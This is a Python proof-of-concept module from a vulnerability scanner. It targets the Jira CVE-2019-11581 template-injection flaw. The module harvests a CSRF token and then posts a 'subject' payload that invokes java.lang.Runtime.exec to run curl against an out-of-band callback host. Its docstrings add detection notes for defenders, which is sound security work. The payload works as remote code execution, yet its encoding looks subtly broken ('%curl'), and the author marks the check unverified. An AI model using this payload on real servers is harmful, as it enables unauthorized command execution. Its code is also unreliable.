#!/usr/bin/env python3
# @Time    : 2020-05-04
# @Author  : caicai
# @File    : poc_jira-cve-2019-11581_2019.py

'''未验证'''

from myscan.lib.parse.response_parser import response_parser
from myscan.config import scan_set
from myscan.lib.core.common_reverse import generate_reverse_payloads, query_reverse
from myscan.lib.helper.request import request  # 修改了requests.request请求的库，建议使用此库，会在redis计数
import re
from urllib.parse import quote


class POC():
    """Check for the Jira Server template-injection issue CVE-2019-11581 (ContactAdministrators form).

    The check is two-stage: fetch the ContactAdministrators form to obtain the
    ``atlassian-token`` CSRF value, then POST to the form with a template
    expression in the ``subject`` field and confirm exploitation only via an
    out-of-band callback (``query_reverse``). Findings are appended to
    ``self.result`` in the framework's dict format.

    Detection note for defenders: the traffic pattern this check produces is a
    GET to ``secure/ContactAdministrators!default.jspa`` followed by a POST to
    ``secure/ContactAdministrators.jspa`` whose ``subject`` parameter contains
    ``$i18n.getClass()`` / ``java.lang.Runtime`` strings, then an outbound
    connection from the Jira host to the scanner's callback URL. Atlassian's
    advisory (linked in ``self.vulmsg``) gives the fixed versions.
    """

    def __init__(self, workdata: dict) -> None:
        """Store the scan work item and the static metadata reported with a finding.

        Args:
            workdata: framework work item; only the ``dictdata`` and ``data``
                keys are read here.
        """
        self.dictdata = workdata.get("dictdata")  # Python dict of the parsed request; see docs/开发指南 for the example layout
        self.url = workdata.get("data")  # directory URL under test, ends with "/" (e.g. https://www.baidu.com/home/)
        self.result = []  # list of finding dicts; each needs name, url, level, detail, and detail must itself be a dict (see verify())
        self.name = "jira rce"
        self.vulmsg = "referer: https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html "
        self.level = 3  # 0:Low  1:Medium 2:High  -- NOTE(review): 3 is outside the legend given here; confirm the framework's severity scale

    def verify(self) -> None:
        """Run the check against ``self.url`` and append a finding to ``self.result`` on a confirmed callback.

        Returns early without testing when the URL's directory depth exceeds the
        configured ``max_dir``. A finding is recorded only when the POST returns
        302 *and* the out-of-band query reports a hit, so a 302 alone is not
        treated as evidence.
        """
        # Respect the directory-depth limit from config.py; the "+2" presumably
        # accounts for the two slashes in "scheme://" -- confirm against scan_set usage elsewhere.
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        # Out-of-band callback: reverse_data is later passed to query_reverse to ask
        # whether the target connected back. The indexing below assumes the first
        # entry is a space-separated string whose second field is the callback URL
        # -- verify against common_reverse.generate_reverse_payloads.
        reverse_url, reverse_data = generate_reverse_payloads("jira_ssrf")
        reverse_url = reverse_url[0].split(" ")[1]
        # Stage 1: GET the form to harvest the CSRF token. Redirects are not
        # followed so a login redirect is reported as non-200 rather than as the form.
        req = {
            "method": "GET",
            "url": self.url + "secure/ContactAdministrators!default.jspa",
            "allow_redirects": False,
            "verify": False,
            "timeout": 10
        }
        r = request(**req)
        if r != None and r.status_code == 200:
            # Token is read from the <meta name="atlassian-token" content="..."> tag.
            res = re.search('name="atlassian-token" content="(?P<token>.+?)"', r.text)
            if res:
                token = res.groupdict().get('token')
                # Stage 2: reuse the same request dict, switched to a POST against
                # the form action. Only "url", "method" and "data" change; the
                # allow_redirects/verify/timeout settings above still apply.
                req["url"] = self.url + "secure/ContactAdministrators.jspa"
                req["method"] = "POST"
                req[
                    "data"] = "from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%curl+{reverseUrl}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={token}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81".format(
                    reverseUrl=quote(reverse_url), token=token)
                r1 = request(**req)
                # A 302 is the form's normal post-submit response, so it is only a
                # precondition; confirmation comes from the callback check.
                if r1 != None and r1.status_code == 302:
                    query_res, query_data = query_reverse(reverse_data)
                    if query_res:
                        # NOTE(review): the evidence captured is the stage-1 GET (r),
                        # not the POST response r1 that actually triggered the callback.
                        parser_ = response_parser(r)
                        self.result.append({
                            "name": self.name,
                            "url": self.url,
                            "level": self.level,  # 0:Low  1:Medium 2:High
                            "detail": {
                                "vulmsg": self.vulmsg,
                                "request": parser_.getrequestraw(),
                                "response": parser_.getresponseraw()
                            }
                        })
